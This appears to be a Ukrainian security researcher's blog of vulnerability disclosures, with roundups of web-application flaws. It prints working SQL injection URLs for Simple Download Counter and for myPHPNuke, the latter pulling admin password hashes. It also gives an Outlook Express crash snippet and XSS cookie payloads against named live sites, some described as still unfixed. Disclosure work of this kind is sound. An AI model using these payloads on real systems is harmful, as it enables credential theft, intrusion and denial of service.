Websecurity - Веб безпека

Першими уразливостями в проекті День багів в браузерах стануть Denial of Service уразливості в Firefox, Internet Explorer та Opera, що я виявив 07.09.2008.

Дану атаку я назвав DoS через букмарки (DoS via bookmarks attack).

DoS:

Firefox DoS Exploit.html - браузер зависає.

IE DoS Exploit.html - браузер не зависає, але ним стає неможливо користуватися і його можна лише закрити (через Task Manager).

Opera DoS Exploit.html - браузер тормозить і забирає 100% CPU.

Opera DoS Exploit (freeze).html - друга (більш потужна) версія експлоіта, що підвішує браузер.

Уразлива версія Firefox 3.0.1 та попередні версії.

Уразлива версія Internet Explorer 6 (6.0.2900.2180) та попередні версії (та потенційно й наступні версії).

Уразлива версія Opera 9.52 та попередні версії.

Ідею атаки (на Firefox) запроновув Aiko ще 20.07.2005 - Bug 301424. І вона так досі й не була виправлена ні Mozilla в своєму браузері, ні Microsoft і Opera не спромоглися запобігти цій атаці в своїх браузерах.

Також нещодавно з’явилися подібні експлоіти для браузерів Flock та Maxthon:

• Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit (деталі)
• Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC (деталі)

В даній добірці уразливості в веб додатках:

• Multiple PHP remote file inclusion vulnerabilities in Linkliste 1.2 (деталі)
• Secure Computing - Security Reporter Auth Bypass and Directory Traversal Vulnerability (деталі)
• Ripe Website Manager SQL Injection and Cross Site Scripting Vulnerabilities (деталі)
• Firesoft Remote File Inclusion (деталі)
• Dalai Forum Remote File Inclusion Exploit (деталі)
• Joomla Component SimpleFAQ V2.11 - Remote SQL Injection (деталі)
• phpress 0.2.0 (adisplay.php) Remote File Inclusion (деталі)
• myphotographer image shop script /events/index.asp sql injection (деталі)
• Olate Download 3.4.2~download.php ~ sql injection (деталі)
• Olate Download 3.4.2~modules/core/fldm.php~comments tag [url] XSS (деталі)

Сьогодні я знайшов SQL Injection уразливість в Simple Download Counter. Як раз коли досліджував даний додаток. Про що найближчим часом повідомлю розробнику веб додатку.

SQL Injection:

Дірку можна використати як для отримання інформації (зокрема інших веб додатків) з БД:

http://site/xmlout.php?file='%20union%20select%20*%20from%20table/*
http://site/xmlout.php?file='%20union%20select%201,1%20from%20table/*

Так і для проведення DoS атак:

http://site/xmlout.php?file='%20and%20benchmark(10000000,benchmark(10000000,md5(now())))/*

Атака можлива при magic quotes off. Уразлива версія Simple Download Counter 1.0.

03.04.2008

У вересні, 16.09.2007, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на проекті http://finance.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

17.09.2008

XSS:

POST запит на сторінці http://finance.ua/ru/feedback
"><script>alert(document.cookie)</script>В полях: Ваше имя, Ваш E-mail.

</textarea><script>alert(document.cookie)</script>В полі: Ваше сообщение.

Дані уразливості вже виправлені.

Insufficient Anti-automation:

В контактній формі немає захисту від автоматизованих запитів.

А ось дана уразливість досі не виправлена.

Сьогодні я виявив Denial of Service уразливість в Microsoft Outlook. Вразлива версія Outlook 2002 (SP-2) та попередні версії (2002 до SP-2 та вірогідно 2000 та попередні). Наступні версії (2003, 2007) також можуть бути вразливі.

DoS уразливість пов’язана з використанням в стилі html-листа властивості position:relative. Дана уразливість ідентична DoS в Outlook Express, про яку я писав раніше.

Експлоіт:

Для атаки потрібно надіслати html-лист на емайл користувача Outlook, що містить в тілі спеціальний код. Експлоіт такий самий, як і для Outlook Express.

DoS exploit

При перегляді цього листа програму виб’є.

P.S.

Як я вияснив, уразливість знаходиться в бібліотеці mshtml.dll.

В даній добірці уразливості в веб додатках:

• Avant Browser <= 11.7 Build 9 Integer Denial Of Service Exploit (деталі)
• Olate Download 3.4.1~environment.php.php~Code Execution (деталі)
• vBulletin V3.6.8 XSS Password Md5 Hash (деталі)
• Directory Traversal in OSNews (деталі)
• Invision Power Board D22-Shoutbox HTML Injections (деталі)
• Mambo Component SimpleFAQ V2.11 - Remote SQL Injection (деталі)
• Vulnerability in Gurur Haber v2.0 (деталі)
• My_REFERER v.1.08 Remote File Include (деталі)
• Butterfly online vistors counter 1.08 RFI (деталі)
• mcLinksCounter 1.2 Remote File Include (деталі)

Сьогодні я виявив Denial of Service уразливість в Microsoft Outlook Express (для Windows XP). Вразлива версія Outlook Express 6.00.2900.2180 та попередні версії. Windows Mail для Windows Vista також може бути вразливим.

DoS уразливість пов’язана з використанням в стилі html-листа властивості position:relative. Дана атака пов’язна з DoS в Internet Explorer, про яку я писав раніше, бо Outlook Express використовує IE для рендерингу html-листів.

Експлоіт:

Потрібно надіслати html-лист на емайл користувача Outlook Express, що містить в тілі наступний код.
<style>*{position:relative}</style>
<table>DoS</table>
DoS exploit

При перегляді цього листа поштовий клієнт виб’є.

P.S.

Як я вияснив, уразливість знаходиться в бібліотеці mshtml.dll.

31.03.2008

У вересні, 08.09.2007, а також додатково сьогодні, я знайшов нові Cross-Site Scripting уразливості на проекті http://www.banner.kiev.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.banner.kiev.ua.

Детальна інформація про уразливості з’явиться пізніше.

15.09.2008

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)

Дані три уразливості більше не працюють після проведених технічних робіт на сайті.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• цікавий

Дані уразливості досі не виправлені.

У серпні, 24.08.2008, після знайдення попередніх, я знайшов нову SQL Injection уразливість в системі myPHPNuke. Дірку я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

SQL Injection:

http://site/download.php?op=viewdownload&cid=-1%20union%20select%20concat(aid,char(45),pwd)%20from%20mpn_authors%20limit%200,1

Уразливі версії до myPHPNuke 1.8.8_8rc2 (тому що в останній версії наявні додаткові фільтри). При цьому остання версія системи також уразлива - в ній можлива обмежена SQL Injection атака.

В даній добірці уразливості в веб додатках:

• Bilder Uploader 1.3 Remote Command Execution Vulnerability (деталі)
• Mapos Bilder Galerie Version 1.0 Remote Command Execution Vulnerability (деталі)
• Gstebuch Version 1.5 Remote Command Execution Vulnerability (деталі)
• File Uploader Version 1.1 Remote Command Execution Vulnerability (деталі)
• FinDix Remote File Inclusion Vulnerability (деталі)
• phpMyAdmin multiple XSS vuln. (деталі)
• Storesprite XSS vuln. (деталі)
• eSoft InstaGate EX2 Cross-Site Request Forgery Attack (деталі)
• IBM Rational ClearQuest Web SQL Injection Login Bypass (деталі)
• Olate Download 3.4.1 ~ admin.php ~ Admin authentication bypassing (деталі)